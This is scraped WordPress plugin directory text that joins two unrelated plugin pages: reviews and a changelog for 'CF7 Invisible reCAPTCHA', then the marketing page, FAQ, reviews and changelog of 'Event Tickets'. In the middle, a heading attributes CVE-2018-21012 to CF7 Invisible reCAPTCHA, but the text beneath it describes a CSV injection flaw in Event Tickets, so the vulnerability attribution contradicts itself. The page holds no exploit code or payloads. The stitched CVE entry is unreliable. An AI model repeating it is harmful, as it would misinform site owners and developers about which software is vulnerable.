If you think, that you found a bug in our CF7 Invisible reCAPTCHA plugin or have any question contact us at wp.support@vsourz.com. Our support team will solve within 24 hours.

Does not work with the latest version of Contact form 7!

Good plugin if need to install Recaptcha for a contact form with the custom position.

Great plugin but it has stopped working for me and is in conflict with Contact Form 7. It's stuck at the spinning wheel after pressing submit button of Contact Form 7. Nothing happens. Please fix asap. WP v4.9.8 This Plugin v1.3.3

Simple plugin, one click to protect all the forms at once. You can exclude certain forms if needed.

The plugin overwrites standard CF7 validation, so I can't use it. Why is that?

Semplicemente non funziona e rompe il form rendendolo inutilizzabile. È molto meglio "Invisible reCaptcha for WordPress" di Mihai Chelaru.

Read all 13 reviews

“CF7 Invisible reCAPTCHA” is open source software. The following people have contributed to this plugin.

Contributors

*    Vsourz Digital

**1.3.3**

*   Optimised the JS code in header.
*   Add class option given for submit button.

**1.3.2**

*   **Minor bug fix:** Security against cross-site scripting (XSS) vulnerability.

**1.3.1**

*   **Minor bug fix:** Resolved the caching issue.

**1.3.0**

*   **Protect form against disabled javascript:** Added script to protect form against disabled javascript from the browser.
*   **Restrict spam entries:** Added script to restrict spam entries to the contact form.

**1.2.1**

*   **Minor tweak related to JavaScript**: Fix issue related to not get any action on click on form submit.

**1.2.0**

*   **Repositioning**: We have set the ‘CF7 Invisible reCAPTCHA’ menu under Contact Form menu.
*   **Validate Credentials**: You can validate your Site Key and Secret Key into ‘CF7 Invisible reCAPTCHA’ menu.

**1.1.0**

*   Fix drop down issue.

**1.0.0**

*   Initial

CVE-2018-21012: CF7 Invisible reCAPTCHA

CSV injection in the event-tickets (Event Tickets) plugin before 4.10.7.2 for WordPress exists via the "All Post> Ticketed > Attendees" Export Attendees feature.

*   Details
*   Reviews
*   Installation
*   Development

Sell tickets and collect RSVPs with the free Event Tickets plugin, from the team behind the number one calendar in WordPress.

This plugin makes it easy to sell tickets, collect registrations, and manage attendees for your in-person or virtual events. Plus, it comes with features backed by our world-class team of developers and designers. Easily integrate Event Tickets with your Stripe account or PayPal business account.

Connect to Stripe and take advantage of one of the world’s most popular payment gateways. Our Stripe integration lets you accept credit card payments on your website, along with additional payment methods including AfterPay, ClearPay, AliPay, Giropay, and Klarna.

See more videos on our YouTube channel

Easily connect to PayPal without any complicated API keys or code through our quick connection wizard in your WordPress backend. With just a few clicks, you can begin selling tickets and enable payment through PayPal, Venmo, and credit cards.

Even more, you can upgrade to Event Tickets Plus and unlock additional payment methods including digital wallets like ApplePay and Google Pay through Stripe, or use WooCommerce to take advantage of popular payment solutions including Braintree, Square, AmazonPay, and more.

**🎟️ Ticketing and Registration for WordPress**

See Event Tickets in action on our demo site. Just getting started? Check out the Getting Started Guide for an introduction to features, settings, and functionality.

Looking for additional features like custom registration fields, QR check-in, Zoom integration, and more? **Check out Event Tickets Plus and our other add-ons**.

**🔌🎨 Plug and Play or Customize**

Event Tickets is built to work out of the box. Just install the plugin, configure your settings, and start collecting RSVPs and selling tickets in minutes.

Add your own touch by using Event Tickets as the foundation for customization. Personalize to your heart’s content with the help of a skeleton stylesheet, partial template overrides, template tags, hooks and filters, careful documentation, and a library of free extensions.

Whether your vision is big or small, you’re in good company. Thousands of small businesses, musicians, venues, restaurants, and non-profits are increasing revenue from their in-person and virtual events with Event Tickets. Our plugins have also been scaled to work on large networks for Fortune 100 companies, universities, and government institutions.

**✨ Features**

✔️ Attendees can purchase tickets to events  
✔️ Attendees can RSVP to events  
✔️ Sell tickets with PayPal and/or Stripe using our free commerce solution, Tickets Commerce.  
✔️ Add RSVPs and tickets to posts, pages, or custom post types  
✔️ Collect ticket fees by connecting your PayPal business or Stripe account  
✔️ Generate sales and attendee reports  
✔️ Ticket stock countdown  
✔️ Automatic ticket confirmation emails  
✔️ Works out of the box with The Events Calendar  
✔️ Responsive design works on all devices  
✔️ Tested on the major theme frameworks such as Avada, Genesis, Kadence, Thesis and many more.  
✔️ Internationalized & translated  
✔️ Extensive template tags for customization  
✔️ Hooks & filters galore  
✔️ Library of extensions

Upgrade to Event Tickets Plus for full WooCommerce integration to use additional payment gateways.

**📃 Documentation**

All of our documentation can be found in our knowledgebase.

Additional helpful links:

*   Guide: Getting Started with Event Tickets
*   Installing Event Tickets Video
*   Using Tickets Commerce Video
*   Do I need Event Tickets or Event Tickets Plus?
*   How to Make Money with Virtual Events
*   Implementing Stripe on Event Tickets and Event Tickets Plus

If you have any questions about this plugin, you can post a thread in the WordPress.org forum. Please search existing threads before starting a new on

**➕ Add-Ons**

Take your calendar to the next level by pairing it with our plugins for ticketing, crowdsourcing, email marketing, and more. Learn more about all our products on our website.  
Our Free Plugins:  
📅 The Events Calendar  
📐 Advanced Post Manager

Our Premium Plugins and Services:

⚡ Events Calendar Pro  
↪️ Event Aggregator (service)  
🎟️ Event Tickets Plus  
✉️ Promoter  
👥 Community Events  
🎟️ Community Tickets  
✏️ Filter Bar  
🗓️ Eventbrite Tickets  
📡 Virtual Events

**Help**

If you aren’t familiar with Event Tickets, check out our Getting Started Guide. It will have you creating tickets in no time.

Ready to dig deeper? Check out these resources:

*   Tutorials
*   Known Issues
*   Help Videos
*   Release Notes

We check in on the Event Tickets forum here on WordPress.org about once a week to help users with basic troubleshooting and identifying bugs. If you’re looking for premium, personalized support, consider upgrading to Event Tickets Plus.

Still have a question? Shoot us an email at support@theeventscalendar.com.

**Translate**

Event Tickets is translated into multiple languages, including German, Danish, and Dutch. Help localize Event Tickets even further by adding your locale – visit translate.wordpress.org.

1.  From the dashboard of your site, navigate to Plugins –> Add New.
2.  Select the Upload option and hit “Choose File.”
3.  When the popup appears select the event-tickets.x.x.zip file from your desktop. (The ‘x.x’ will change depending on the current version number).
4.  Follow the on-screen instructions and wait as the upload completes.
5.  When it’s finished, activate the plugin via the prompt. A message will show confirming activation was successful.
6.  For access to new updates, make sure you have added your valid License Key under Tickets –> Settings –> Licenses.

**Are there any troubleshooting steps I should try before I post a new thread in the support forum?**

First, make sure that you’re running the latest version of Event Tickets. If you’ve got any other add-ons, make sure those are current and running the latest code as well. Also be sure to check our knowledgebase.

The most common issues we see are either plugin or theme conflicts. You can test if a plugin or theme is conflicting by manually deactivating other plugins until just Event Tickets is running on your site. If the issue persists, revert to the default Twenty Twenty theme. If the issue is resolved after deactivating a specific plugin or your theme, you’ll know that is the source of the conflict.

Note that we aren’t going to say “tough luck” if you identify a plugin/theme conflict. While we can’t guarantee 100% integration with any plugin or theme out there, we will do our best (and reach out the plugin/theme author as needed) to figure out a solution that benefits everyone.

**I’m still stuck. Where do I go to file a bug or ask a question?**

Free plugin users can post in the Event Tickets support forum on WordPress.org. Our team reviews that forum weekly to look for bug reports.

If you’re already an Event Tickets Plus subscriber, you’re entitled to our actively-monitored Premium Support on our website. Generally, except in times of increased support loads, we reply to all premium support tickets within 24 hours during the business week.

**What’s the difference between Event Tickets and Events Tickets Plus?**

Event Tickets is our free ticketing plugin that has all the basics you need to sell tickets and collect RSVPs on your website. You can use Event Tickets with or without The Events Calendar.

Event Tickets Plus is a premium plugin that runs alongside Event Tickets and enhances it with extra features, including custom registration fields, shortcodes, WooCommerce integration, enhanced Stripe functionality for Stripe for Tickets Commerce, our mobile ticketing app and more.

Read more to learn which plugin is right for you.

**Do I need The Events Calendar to run Event Tickets?**

Nope! Event Tickets works with or without The Events Calendar. Even if you don’t have The Events Calendar, you can create RSVPs and tickets on WordPress pages and posts.

**Can I email attendees using Event Tickets?**

Yes. Event Tickets automatically sends an email confirmation after attendees register or RSVP for an event. If the attendee purchases a ticket, the confirmation email will also provide a ticket to scan at the door for admission.

**What add-ons are available for Event Tickets, and where can I read more about them?**

The following add-ons are available for The Events Calendar:

*   Events Calendar Pro, for adding premium calendar features like recurring events, advanced views, cool widgets, shortcodes, additional fields, and more!
*   Event Aggregator, a service that effortlessly fills your calendar with events from Meetup, Google Calendar, iCalendar, Eventbrite, CSV, and ICS.
*   Virtual Events, which optimizes your calendar for virtual events including Zoom integration, video and livestream embeds, SEO optimization for online events and more.
*   Event Tickets Plus, which allows you to sell tickets for your events using your favorite e-commerce platform.
*   Promoter, automated email communication made just for The Events Calendar and Event Tickets. Stay in touch with your attendees every step of the way.
*   Community Events, for allowing frontend event submission from your readers.
*   Community Tickets, which allows event organizers to sell tickets to the events they submit via Community Events.
*   Filter Bar, for adding advanced frontend filtering capabilities to your events calendar.
*   Eventbrite Tickets, for selling tickets to your event directly through Eventbrite.

**I have a feature idea. What’s the best way to tell you about it?**

We’ve got a LoopedIn page where we’re actively watching for feature ideas from the community. Vote up existing feature requests or add your own, and help us shape the future of the products business in a way that best meets the community’s needs.

**I’ve still got questions. Where can I find answers?**

Check out our extensive knowledgebase for articles on using, tweaking, and troubleshooting our plugins.

Both my client and myself are very disappointed with the modernization process of TEC + Tickets Pro to the Block Editor. Every step has been painful for over 6 months. We’ll be replacing this with a competing plugin.

Email support was good. Apart from referring to the manuals, as they should, they still investigated further and gave us a solution for our problem. Well done!

So many bug when it comes to payment and support is so so so slow. I am losing sales because to this. Using Stripe: Apple pay freezes No Way to turn off Apple Pay, turning it off doesnt save Can't validate webhook Support keeps asking me to create a staging to test, sure, but they take a week to reply. Some support staff even told me they have no experience with apple pay and it is not their feature, i mean...come on...its right there in your setting

Followed the documentation, but cannot get Stripe to validate webhook. Read other support threads and have confirmed that everything is in order as per the documentation. I was testing out the plugin, but given the time wasted, there is no way I will continue to use it to sell tickets if the free version which includes a 2% fee doesn't work, why would I bother upgrading to the premium version. Seem to much of a risk. Also, looking at people comments, it seems support is slow (they are constantly away from the office/out of the office. Look at other plugins out there.

Constant issues. Nearly impossible to make work. Stops working for no apparent reason. I make websites, used probably hundreds of different plugins over the years. This is in the top 5 worst. There is an easy/user friendly way to do things. This plugin does the opposite in nearly every avenue.

Despite having over 18 months of warning from EDD that their plugin needed updating, they have failed to make any progress whatsoever. They use incompatible, depreciated methods which means tickets sold do not have the attendees details saved, just the purchaser. If I could give this negative stars, I would.

Read all 130 reviews

“Event Tickets and Registration” is open source software. The following people have contributed to this plugin.

Contributors

**\[5.5.8\] 2023-02-22**

*   Version – Event Tickets 5.5.8 is only compatible with The Events Calendar 6.0.10 and higher.
*   Version – Event Tickets 5.5.8 is only compatible with Event Tickets Plus 5.6.7 and higher.
*   Tweak – PHP version compatibility bumped to PHP 7.4
*   Tweak – Version Composer updated to 2
*   Tweak – Version Node updated to 18.13.0
*   Tweak – Version NPM update to 8.19.3
*   Tweak – Reduce JavaScript bundle sizes for Blocks editor

**\[5.5.7\] 2023-02-09**

*   Enhancement – Added currency format options to alter currency decimal separator, thousand separator, and number of decimal places. \[ET-1608\]
*   Tweak – Updated Currency options in Tickets Commerce settings for Croatian users from Kuna (HRK) to Euro (EUR). \[ET-1625\]
*   Tweak – Updated Attendee Registration Fields upsell notice to only display in admin dashboard. \[CT-67\]
*   Fix – Resolve provisional IDs properly on the event edit screen for ticket management actions. \[ET-1632\]
*   Fix – Fixed Ticket Commerce cart cookies not getting saved. \[ET-1629\]
*   Language – 28 new strings added, 189 updated, 5 fuzzied, and 3 obsoleted

**\[5.5.6\] 2023-01-16**

*   Tweak – Updated the settings description for stock handling options. \[ET-1603\]
*   Tweak – Added the tribe-tickets__tickets-item--shared-capacity wrapper class for tickets having shared capacity. \[ETP-841\]
*   Tweak – Added a dashboard notice for sites running PHP versions lower than 7.4 to alert them that the minimum version of PHP is changing to 7.4 in February 2023.
*   Enhancement – Added search capabilities to the Tickets Commerce Orders report page. \[ET-1259\]
*   Fix – Allow loading attendance page with event_id params that use The Events Calendar provisional IDs. \[ET-1624\]
*   Language – 4 new strings added, 43 updated, 0 fuzzied, and 2 obsoleted

**\[5.5.5\] 2022-12-08**

*   Fix – Remove need for Platform Controls to verify webhook signatures in Stripe. \[ET-1508\]
*   Fix – Fixed the order of tickets in an event changing when you haven’t manually requested it. \[ET-1568\]
*   Fix – Fixed shared capacity tickets only showing the lowest capacity between the shared pool tickets. \[ETP-815\]
*   Tweak – Removed locale param for Tickets Commerce JS SDK as per PayPal recommendation. \[ET-1615\]
*   Language – 110 new strings added, 193 updated, 5 fuzzied, and 24 obsoleted

**\[5.5.4\] 2022-11-09**

*   Fix – Fixes multiple of the same ticket form being on the same page being out of sync. \[GTRIA-729\]
*   Fix – Added a JS event that checks for attendee label validation if ET+ is active. \[ETP-803\]

**\[5.5.3\] 2022-10-31**

*   Fix – Orderby param not working for Attendee archive REST API. \[ET-1591\]
*   Fix – Properly save the check-in details for attendees on check-in. \[ETP-819\]
*   Fix – TicketsCommerce ticketed events not showing up for Events REST API. \[ET-1567\]
*   Fix – Update version of Firebase/JWT in Common from 5.x to 6.3.0
*   Enhancement – Added support for name and email param for searching in Attendee archive REST API. \[ET-1591\]
*   Enhancement – Add template tag to properly check if The Events Calendar is active. \[ETP-820\]
*   Enhancement – Add attendance information to the events REST API endpoint. \[ET-1580\]
*   Enhancement – Add check_in argument support for attendees REST API endpoint. \[ET-1588\]
*   Language – 0 new strings added, 18 updated, 0 fuzzied, and 0 obsoleted

**\[5.5.2\] 2022-10-20**

*   Fix – Update version of Firebase/JWT in Common from 5.x to 6.3.0

**\[5.5.1\] 2022-09-22**

*   Fix – Listing tickets is no longer limited by the global settings. \[ET-1584\]
*   Fix – Correct parameter type hinting when param can be null. \[ET-1582\]
*   Fix – Showing Checkout not available and credit card fields at the same time for PayPal gateway in TicketsCommerce. \[ETP-812\]
*   Language – 0 new strings added, 1 updated, 0 fuzzied, and 0 obsoleted

**\[5.5.0\] 2022-09-06**

*   Version – Event Tickets 5.5.0 is only compatible with The Events Calendar 6.0.0 and higher.
*   Version – Event Tickets 5.5.0 is only compatible with Event Tickets Plus 5.6.0 and higher.
*   Enhancement – Adds a compatibility layer to work with the new Recurrence Backend Engine in TEC/ECP.
*   Language – 4 new strings added, 49 updated, 0 fuzzied, and 3 obsoleted

See changelog for all versions

Tag

#sap